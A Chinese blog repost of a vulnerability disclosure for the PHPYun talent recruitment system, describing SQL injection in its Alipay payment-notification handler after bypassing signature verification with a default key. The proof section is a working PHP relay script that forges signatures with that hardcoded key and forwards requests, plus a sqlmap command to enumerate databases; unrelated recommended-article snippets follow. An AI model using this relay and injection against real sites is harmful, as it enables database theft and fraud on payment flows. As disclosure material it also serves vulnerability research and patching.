api uc.php 漏洞,php云人才系统 UC API 未初始化注入漏洞

最新推荐文章于 2023-11-09 08:33:28 发布
最新推荐文章于 2023-11-09 08:33:28 发布
阅读量149 收藏
点赞数
文章标签: api uc.php 漏洞

### 简要描述:

### 详细说明:

api/alipaydual/notify_url.php

require_once("alipay.config.php");

require_once("lib/alipay_notify.class.php");

require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php");

require_once(dirname(dirname(dirname(__FILE__)))."/include/mysql.class.php");

$db = new mysql($db_config['dbhost'], $db_config['dbuser'], $db_config['dbpass'], $db_config['dbname'], ALL_PS, $db_config['charset']);

//计算得出通知验证结果

$alipayNotify = new AlipayNotify($aliapy_config);

$verify_result = $alipayNotify->verifyNotify();//有一处验证 验证可以绕过

if($verify_result) {//验证成功

echo 222;/

//请在这里加上商户的业务逻辑程序代

//——请根据您的业务逻辑来编写程序(以下代码仅作参考)——

//获取支付宝的通知返回参数,可参考技术文档中服务器异步通知参数列表

$out_trade_no= $_POST['out_trade_no']; //获取订单号

$trade_no= $_POST['trade_no']; //获取支付宝交易号

$total= $_POST['price'];//获取总价格

$sql=$db->query("select * from `".$db_config["def"]."company_order` where `order_id`='$out_trade_no'");//这里进行了注入

echo "select * from `".$db_config["def"]."company_order` where `order_id`='$out_trade_no'";

$row=mysql_fetch_array($sql);

$sOld_trade_status = $row['order_state'];

if($_POST['trade_status'] == 'WAIT_BUYER_PAY') {

验证代码:

function verifyNotify(){

if(empty($_POST)) {//判断POST来的数组是否为空

return false;

}

else {

//生成签名结果

$mysign = $this->getMysign($_POST);//这里会产生一个KEY 我们跟一下

echo $mysign."||";

function getMysign($para_temp) {

//除去待签名参数数组中的空值和签名参数

$para_filter = paraFilter($para_temp);

//对待签名参数数组排序

$para_sort = argSort($para_filter);

//生成签名结果

echo trim($this->aliapy_config['key'])."::". strtoupper(trim($this->aliapy_config['sign_type'])).":x:";

$mysign = buildMysign($para_sort, trim($this->aliapy_config['key']), strtoupper(trim($this->aliapy_config['sign_type'])));//可以看到这里有利用一个KEY 进行加密 这个KEY是有默认值的 我们可以构造一个中转来生产一个KEY进行注入!

return $mysign;

}

### 漏洞证明:

中转程序如下

================================================================================

function paraFilter($para) {

$para_filter = array();

while (list ($key, $val) = each ($para)) {

if($key == "sign" || $key == "sign_type" || $val == "")continue;

else$para_filter[$key] = $para[$key];

}

return $para_filter;

}

function argSort($para) {

ksort($para);

reset($para);

return $para;

}

function createLinkstring($para) {

$arg = "";

while (list ($key, $val) = each ($para)) {

$arg.=$key."=".$val."&";

}

//去掉最后一个&字符

$arg = substr($arg,0,count($arg)-2);

//如果存在转义字符,那么去掉转义

if(get_magic_quotes_gpc()){$arg = stripslashes($arg);}

return $arg;

}

function sign($prestr,$sign_type='MD5') {

$sign='';

if($sign_type == 'MD5') {

$sign = md5($prestr);

}elseif($sign_type =='DSA') {

//DSA 签名方法待后续开发

die("DSA 签名方法待后续开发,请先使用MD5签名方式");

}else {

die("支付宝暂不支持".$sign_type."类型的签名方式");

}

return $sign;

}

function buildMysign($sort_para,$key,$sign_type = "MD5") {

//把数组所有元素,按照“参数=参数值”的模式用“&”字符拼接成字符串

$prestr = createLinkstring($sort_para);

//把拼接后的字符串再与安全校验码直接连接起来

$prestr = $prestr.$key;

//把最终的字符串签名,获得签名结果

$mysgin = sign($prestr,$sign_type);

return $mysgin;

}

function getMysign($para_temp) {

//除去待签名参数数组中的空值和签名参数

$para_filter = paraFilter($para_temp);

//对待签名参数数组排序

$para_sort = argSort($para_filter);

//生成签名结果

$mysign = buildMysign($para_sort, 'jbjwjnu6zhax0eewc3vfiqldvrg8rnfz', 'MD5');

return $mysign;

}

$hash=getMysign($_POST);

$host="127.0.0.1";//这里设置下host!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

$data="sign={$hash}&out_trade_no={$_POST[out_trade_no]}";

$username=rawurlencode(stripslashes($_GET['username']));

$message = "POST /yun/api/alipaydual/notify_url.php HTTP/1.1\r\n";//这里记得修改路径!!!!!!!!!!!!!!!!!!!!

$message .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij\r\n";

$message .= "Host: {$host}\r\n";

$message .= "Content-Length: ".strlen($data)."\r\n";

$message .= "Connection: close\r\n";

$message .= "\r\n";

$message .=$data;

//echo $message;

//file_put_contents('2.txt',$message,FILE_APPEND);

//print $message;

//exit();

$ock=fsockopen($host,80);

if (!$ock) {

echo 'No response from xx!';

//die;

return '';

}

fputs($ock,$message);

while ($ock && !feof($ock))

$resp .= fread($ock, 1024);

echo $resp;

?>

测试方式

sqlmap.py -u "http://127.0.0.1/x.php" --data="out_trade_no=1" --dbs

就可以了

[QQ截图20131105010306.png](https://images.seebug.org/upload/201311/21201216df9a9f8d92c8e7274ceb6fde0cff1f21.png)

loading-bars.svg

weixin_39541750
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1555
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
php人才系统漏洞,php人才系统 注入漏洞
weixin_42131541的博客
03-18 692
### 简要描述:php人才系统 注入漏洞### 详细说明:php人才系统 注入漏洞tenpay的KEY没有初始化导致的注入漏洞!```/api/tenpay/return_url.phprequire_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php");require_once(dirname(dirname(dir...
lib api.php,ecshop /api/client/api.php、/api/client/includes/lib_api.php注入漏洞修复
weixin_35804761的博客
04-03 294
1. 漏洞描述ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库2. 漏洞触发条件1./api/client/api.php存在过滤漏洞2.服务器magic_quote_gpc=off//magic_quote_gpc特性已自PHP5.3.0起废弃并将自PHP5.4.0...
php人才系统漏洞,phpyun人才招聘cms注入漏洞
weixin_39927144的博客
03-18 388
api/alipay/alipayto.php[php]require_once("alipay_config.php");require_once("class/alipay_service.php");require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php");require_once(dirname(dirn...
php人才系统漏洞,phpyun人才招聘cms注入漏洞 | CN-SEC 中文网
weixin_34726945的博客
03-18 324
摘要api/alipay/alipayto.php[php]require_once(“alipay_config.php”);require_once(“class/alipay_service.php”);api/alipay/alipayto.php[php]require_once("alipay_config.php");require_once("class/alipay_servic...
api uc.php 漏洞,api uc.php 漏洞
weixin_29061509的博客
03-11 172
Re阿里提示Discuz uc.key泄露导致代码注入漏洞uc.php的解决方法if(!API_UPDATEBADWORDS) {return API_RETURN_FORBIDDEN;}$data = array();if(is_array($post)) {foreach($post as $k =...
Discuz快照被劫持:DZ被挂马常被利用漏洞都在这
lixon166的博客
02-23 1593
0x00 网站快照劫持:DZ常见漏洞利用分析 0x01Discuz上传图片附件实现远程命令执行漏洞 漏洞产生过程:forum_image.php中的$w,$h变量可控,末处理直接传入Thumb()函数,经该函数传入Thumb_IM()函数,最终调用exec()导致远程命令执行漏洞。 通过分析可知:需要forum.php调用image_class模块调用图像预览功能,后台上传设置为ImagicMagick库,默认为GD库渲染。前台登录发贴上传图片附件。 提示:forum.php是常被利用的文...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 838
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
前端2020面试题195道
热门推荐
weijieyuhyt的博客
01-13 1万+
HTML5面试题 一、 Doctype的作用? 严格模式和混杂模式的区分,以及如何触发这2种模式? <!DOCTYPE> 声明位于文档中的最前面,处于 标签之前。告知浏览器的解析器,用什么文档类型 规范来解析这个文档。 DOCTYPE不存在或格式不正确会导致文档以混杂模式呈现。 严格模式就是浏览器根据web标准去解析页面,是一种要求严格的DTD,不允许使用任何表现层的语法, 混杂模式...
Shopex模板机制总览(摘要版)
06-22 2972
此文档旨在为 shopex 二次开发提供一个便利的参考信息,借以打开 shopex 架构的大门,希望能带给读者一种登堂入室的感觉。由于 shopex 是半开放源代码的形式发布的,而且官方也没有意思要做好文档的公开工作,因此,二次开发中难题较多,这篇文章正是出于答疑解难的观点编写的。如果对诸位有大有裨益,则我会心花怒放;即是小有启发,也是我写作的最大满足;如果不才,读者可以领略到一丝一息的有用内容,口下留情,适当一批或一评即好。本文要求读者有 PHP、HTML 语言的基础,不扎实也是可以的,还要求一点 MV
api uc.php 漏洞,Phpcms V9 uc api SQL注入漏洞
weixin_29863401的博客
03-11 356
漏洞分析:1.启用ucenter服务的情况下uc_key为空define('UC_KEY', pc_base::load_config('system', 'uc_key'));2. deleteuser接口存在SQL注入漏洞UC算法加密的参数无惧GPC,程序员意识到$get['ids']会存在SQL注入情况。public function deleteuser($get,$post) {p...
php100漏洞,phpyun人才管理系统V5.0 SQL注入漏洞分析
weixin_39636707的博客
03-11 785
*世界上最愚蠢的事莫过于我们无比狂热地做一件事,到最后却不知道为什么要做*cms背景介绍PHP人才管理系统(phpyun)是国内主流人才管理CMS系统之一!PHP专为中文用户设计和开发,采用:B/S+c/s技术框架,程序源代码100%完全开放!基于PHP 和 MySQL 数据库构建的为核心开发。漏洞类型前台SQL盲注漏洞描述Phpyun最新版本V5.0中,在用户邮箱认证处,存在SQL延时注入。...
discuz api uc.php 漏洞,解读Discuz论坛程序中UCenter致命性UC_KEY漏洞
weixin_36146811的博客
03-18 1038
Discuz早已是朋友家喻户晓的程序了,几乎所有玩过论坛的朋友都或多或少知道它,但也因为这么大的平台(腾讯旗下品牌)也有着很严重的安全漏洞。所以以下图为例为大家展示一下!希望能够对大家有所帮助!Kiscu!是知名的开源论坛建站程序,在国内有着庞大的用户群体,一旦发生安全漏洞,做网站受影响网站将不计其数。有白帽发现Kiscuz!程序存在一个安全bug,在得知UC_KEY的情况下,可以轻松向站点写入后...
phpmps uc.php 漏洞 修复,CVE-2019-11043-PHP远程代码执行漏洞修复方式
weixin_33291684的博客
03-11 329
2019-10-251218 次阅读在9 月 14 日至 18 举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。9 月 26 日,PHP 官方发布漏洞通告,其中指出:使用 Nginx + php-fpm 的服务器,在部分配置下,存在远程代码执行漏洞。并且该配置...
php任意代码执行漏洞浅析
Hydra的博客
11-20 6959
漏洞成因  当应用在调用一些能将字符转化为代码的函数(如PHP中的eval,assert)时,没有考虑用户是否能控制这个字符串,这就会造成代码执行漏洞。 常见函数 php:eval,assert python:exec 区别 eval与assert区别 eval函数中参数是字符,如: eval('echo 1;'); assert函数中参数为表达式 (或者为函数),如: ...
泛微协同办公平台E-cology9.0版本后台维护手册(D)--流程引擎.docx
最新发布
09-03
泛微后端技术文档
A fast intra mode decision algorithm combining neighboring info
09-03
论文提出了一种用于H.264/AVC高配置文件的快速帧内模式决策算法,旨在降低编码复杂度。 算法基于当前块的内容以及邻块的空间连续性来选择最佳预测模式。 通过使用重建的邻域像素,不同的预测模式会导致不同的残差块,算法利用残差块的特征来辅助模式决策。 提出的算法使用绝对变换差之和(SATD)来衡量残差块,并使用最可能的模式来指示邻块预测模式的影响。 实验结果表明,与全搜索算法相比,所提出的算法在编码性能略有下降的情况下,有效降低了帧内预测的复杂度
《会员卡刷卡消费管理系统专业版》是一款集系统设置、会员管理、充值积分、会员消费、查询统计于一体的软-MbccmsP.zip
09-03
c 《会员卡刷卡消费管理系统专业版》是一款集系统设置、会员管理、充值积分、会员消费、查询统计于一体的软_MbccmsP.zip 《会员卡刷卡消费管理系统专业版》是一款集系统设置、会员管理、充值积分、会员消费、查询统计于一体的软_MbccmsP.zip 《会员卡刷卡消费管理系统专业版》是一款集系统设置、会员管理、充值积分、会员消费、查询统计于一体的软_MbccmsP.zip 《会员卡刷卡消费管理系统专业版》是一款集系统设置、会员管理、充值积分、会员消费、查询统计于一体的软_MbccmsP.zip 《会员卡刷卡消费管理系统专业版》是一款集系统设置、会员管理、充值积分、会员消费、查询统计于一体的软_MbccmsP.zip 《会员卡刷卡消费管理系统专业版》是一款集系统设置、会员管理、充值积分、会员消费、查询统计于一体的软_MbccmsP.zip 《会员卡刷卡消费管理系统专业版》是一款集系统设置、会员管理、充值积分、会员消费、查询统计于一体的软_MbccmsP.zip《会员卡刷卡消费管理系统专业版》是一款集系统设置、会员管理、充值积分、会员消费、查询统计于一体的软_MbccmsP.zip 《会
基于springboot学生选课系统设计与实现.docx
09-03
基于springboot学生选课系统设计与实现.docx
中信证券CATS自动化交易平台API详解
"中信证券的CATS自动化交易平台API是一个专为自动炒股开发者设计的接口工具包,用于实现量化交易。该API采用全双工异步通信模式,具有易用性和灵活性,封装了底层通信和加密技术,使得开发者能更专注于业务功能的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值